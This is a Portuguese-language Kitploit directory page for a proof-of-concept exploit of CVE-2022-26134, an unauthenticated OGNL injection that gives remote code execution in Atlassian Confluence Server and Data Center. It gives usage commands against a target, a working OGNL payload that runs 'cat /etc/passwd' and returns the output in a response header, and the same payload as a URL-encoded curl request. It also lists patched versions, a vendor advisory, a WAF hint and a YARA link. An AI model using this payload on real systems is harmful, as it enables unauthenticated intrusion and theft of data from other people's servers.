Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — Exploit de prova de conceito para CVE-2022-26134, uma vulnerabilidade de injeção OGNL no Atlassian Confluence Server e Data Center, permitindo execução remota de código não autenticada. | Kitploit
Ferramentas/GitHubGitHub/b4dboy17/cve-2022-26134
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubb4dboy17/cve-2022-26134

CVE-2022-26134

Exploit de prova de conceito para CVE-2022-26134, uma vulnerabilidade de injeção OGNL no Atlassian Confluence Server e Data Center, permitindo execução remota de código não autenticada.

Ver Repositório
2há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134 - Vulnerabilidade de injeção OGNL.

Script de prova de conceito que explora a vulnerabilidade de execução remota de código que afeta o Atlassian Confluence 7.18 e produtos inferiores. A vulnerabilidade de injeção OGNL permite que um usuário não autenticado execute código arbitrário em uma instância do Confluence Server ou Data Center.

Versões afetadas

Todas as versões suportadas do Confluence Server e Data Center são afetadas.
As versões do Confluence Server e Data Center posteriores a 1.3.0 e inferiores a 7.18.1 são afetadas.
A vulnerabilidade tem uma pontuação CVSS de 10 em 10 para criticidade.

Dependências:

  • Python 3.3+
  • As dependências podem ser satisfeitas via pip install -r requirements.txt

Como usar:

Clone o repositório

root@kitploit:~
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

Então você pode executar o exploit com o comando de sua escolha da seguinte forma:

root@kitploit:~
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

Vídeo de Prova de Conceito

Script de PoC CVE-2022-26134

Vídeo PoC CVE-2022-26134 Injeção OGNL Atlassian Confluence

Payload

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Exemplo com comando CURL:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Então, o resultado do comando será refletido no parâmetro X-Cmd-Response no cabeçalho da resposta.

Diretrizes de mitigação dos fornecedores

Siga as recomendações oficiais da Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Versões corrigidas

A Atlassian lançou as versões 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 e 7.18.1 que contêm uma correção para este problema.

Capacidades de detecção

Esta vulnerabilidade afeta todas as instâncias auto-hospedadas. Se você usar um WAF, pode bloquear URLs com ${ dentro.

YARA (by Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

Nota

APENAS PARA FINS EDUCACIONAIS.

CVE-2022-26134 meme fogo

Crédito: https://github.com/Nwqda

Baixar ferramenta